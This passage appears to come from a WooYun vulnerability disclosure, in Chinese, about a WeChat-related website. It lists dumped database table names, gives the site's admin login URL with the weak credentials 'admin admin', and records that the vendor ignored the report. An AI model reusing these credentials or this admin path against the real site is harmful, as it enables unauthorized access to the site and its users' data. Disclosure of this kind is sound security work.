| wx_img_double |
| wx_img_double_list |
| wx_img_single |
| wx_keyword |
| wx_member |
| wx_service_logs |
| wx_service_user |
| wx_text |
| wx_users |
| wx_wechat_group |
| wx_wechat_group_list |
| wx_wsite_article |
| wx_wsite_articlei |
| wx_wsite_classify |
| wx_wsite_set |
| wx_wsite_slideshow |
| wx_wxacc |
| wx_wxuser |
+---------------------------------------+

1.png


密码还是弱口令

admin admin
http://www.wenji99.com/dlq9J15DshW5f/index.php


2.png

3.png


修复方案:

版权声明:转载请注明来源 头晕脑壳疼@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-19 12:04

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价